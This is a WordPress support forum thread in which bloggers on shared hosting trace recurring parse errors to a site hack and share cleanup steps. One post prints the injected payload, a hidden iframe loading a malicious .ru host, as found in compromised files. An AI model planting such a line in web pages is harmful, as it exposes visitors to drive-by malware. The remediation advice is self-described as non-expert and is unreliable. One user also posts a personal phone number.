Hello,
My blog keeps on crashing -by itself-, with this message:
Parse error: syntax error, unexpected '<' in /homepages/4/d134610354/htdocs/moebius77/blog2/wp-includes/default-widgets.php on line 1034
I can get it back up by substituting file d-w.php for the original WP 2.8 file, but after a while it crashes again; I open the file and it's incomplete.
What is going on?
How can I fix this?
Thanks,
Vinz
syntax error on default-widgets.php file (10 posts)
-
vinz77
Posted 2 months ago # -
Posted 2 months ago #Got It:
1) re-install all your Wordpress blog, FTP it onto the server again, EXCEPT the WP-Content folder if you want to keep your images and themes.
2) Now you should be able to login. Go to your dashboard and install plugin "Script Exploiter".
3) Run the plugin and look for malicious script. In my case, I had this baby:
<div style="display:none"><iframe src="http://past-another-life.ru:8080/index.php" width=571 height=464 ></iframe></div>
copied on most of my install.php files, on all the themes (default, etc.), on the plugins and others.
4) Download the files with the added script, open them with an editor and erase all the garbage.
5) FTP them back on the server, you should be all right.
Cheers, hope this helps,
Vinz -
vik79
Posted 1 month ago #Hi Vinz,
I have been getting the same error for the last 3 days and been searching on Google and finally found your post. Looks like this is a relatively new problem. I am still getting the same error so i need your help!
Just a little earlier (before finding your post) i delete all files from my web-server and uploaded the word press back. I was able to enter my db details and on the next step got the same error again. I followed your instruction and deleted WP-Content folder hoping this would allow me to login but I am still getting the same error?
I am with 1and1.com shared hosting and thought that i was having problems configuring ioncube loader but looks like i gotta get rid of the malicious code first.
Please reply back and help me
Vik
-
looks like i gotta get rid of the malicious code first.
Yes, sudden parse errors can be a sign of hacking.
-
Posted 1 month ago #Hello, Vik79,
1) I lost my password so am logged in with nick.
2) I was also with 1and1, I suspect it's a server virus script on their end: but I called and email them- to no avail.
3) Here's the thing: that script is a smart little f*cker. If you leave just a string of it lying around, it'll multiply and kill your site before you know it.
4) Actually, after I wrote this it came back up again, because it had leaked onto all the sites we host on 1and1.
5) So: you have to be absolutely sure you've isolated it. Compare your index.php files with the clean Wordpress ones; you should be able to make out what the complete string is. Do not leave anything on there; at first, I left a <div> </div> because I thought it amounted to nothing; remember, it's a hidden string. Make sure your index' are just "<?php> silence is golden" or whatever the original WP has.
6) You have to clean all your pages, even static non-blog pages. I found it there too. Where there's an index, there's a way he'll get on it. Actually, he didn't make my other pages crash but web navigators would flare my site for "malicious script".
7) Get into contact with whoever shares your server and has pages on it. We had 7 or 8 sites up; had to take them all down, erase the server completely, clean every page and put it back up. Yes, it takes time. Yes, it sucks. You've been served.
8) My "WP-Content" folder was FUCKED. Everytime I reinstalled, I got all kinds of errors. So I had to go from scratch: Reinstall WP, reinstall my theme, and plugins, one by one. Don't worry, the WP database keeps track of your widgets and stuff so no major redesign is in order, but it'll take you a minute or two.
9) Important: After you take everything off your server, change FTP access passwords. It seems the hack is coming from FTP clients (like Smart FTP) that keep passwords open and get stolen. So go to 1and1 and change that, tell whoever shares server with you to do the same, and don't click the "remember password" box on your FTP client.
If you make sure every site on the server is clean, you change FTP passwords and upload it, technically, you should be ok. Of course, I'm no IT expert, I'm just a blogger. This site gets into the semantics of it all (and provides no solution whatsoever -gotta love 'em):
http://blog.unmaskparasites.com/2009/09/17/quicksilver-malware-network/
Good luck, I'll be around but again, I know very little about programming. These are just my clumsy recommendations.
Vinz. -
Posted 1 month ago #Vinz,
I would have felt really outraged if this were to happen to my established websites. I am glad that you know what you are doing ..hopefully you will be back up and running soon.
Luckily for me, I usually do direct linking and never had an established website of my own. I did registered a few domains on 1and1 to start a couple of niche sites.
Ok so I am going to take following steps to hopefully fix the damage:-
1. Delete wordpress folder from my computer
2. Delete wordpress folder from my server
3. Erase my ftp details and change my 1and1 login information.
4. Upload fresh copy of wordpress.
5. Try to get the Ioncube loader going (hopefully i will get it this time)
6. Delete all my plugins from my PC, download them fresh and upload em.If you think of anything else I should do pls lemme know. I am in Melbourne Australia and it's getting late up here.. so i will wait for the fresh install till tomorrow.
Again, thx for your assistance.. knowing that there is not a lot of info about this problem you have really done a good service to whoever happens to visit this page!
Cheers,
Vik
-
Posted 1 month ago #...As per my experience, that should work...
Too bad the real experts that hang around this site and others can't have a professional say on the thing...
P.d.: Make SURE you make a backup of your MySQL tables somewhere in between. The script doesn't seem to affect your tables but just in case, hang onto those because that's were all your blog info is.
You'll find those in your PHP section of my 1and1.
That said, that's the limit of my blog knowledge. I really hope it works and am crossing me's fingers for you...
Don't worry, you'll be celebrating over a Foster's in no time!
Peace,
V. -
covellz
Posted 1 month ago #Hello group! I have spent 30 hours over the last 3 1/2 days getting my wordpress blog up at http://zackcovell.com
My problem is that for the 3rd day in a row I get the following error after I leave the site for a little bit and then come back.
Parse error: syntax error, unexpected '<' in /homepages/10/d232920448/htdocs/wp-includes/default-widgets.php on line 1034
I seriously need some help identifying what the heck is wrong with the script or something else.
Please DO NOT tell me to start over, I've read this forum already twice and have crashed my blog through some unknown method twice.
Thanks and call if you'd like to offer some assistance. Zack 503-325-2858
-
I emailed you zack -- Im not up to phone calls this early. :)
-
Posted 1 month ago #Hello it's Vik79 checking in..
I posted couple of days ago, about the problem with word press installation. I followed exactly what i wrote above and it worked!
Had to completely wipe off everything related to wordpress and plugins from my computer and the server to be 100% sure that no trace of the malicious code is left. Then re-uploaded everything back. I even figured out the ioncube loader install on 1and1.
Fingers crossed everything looks good now.
I would like to mention here that this was a new domain, so i didn't had to backup or do any of the extra effort so what i have done may not be relevant to existing sites with content.
Thanks to Vinz/moebius77 for assistance.
Good luck to you all!
Peace to you and yours,
Vik
Reply
You must log in to post.
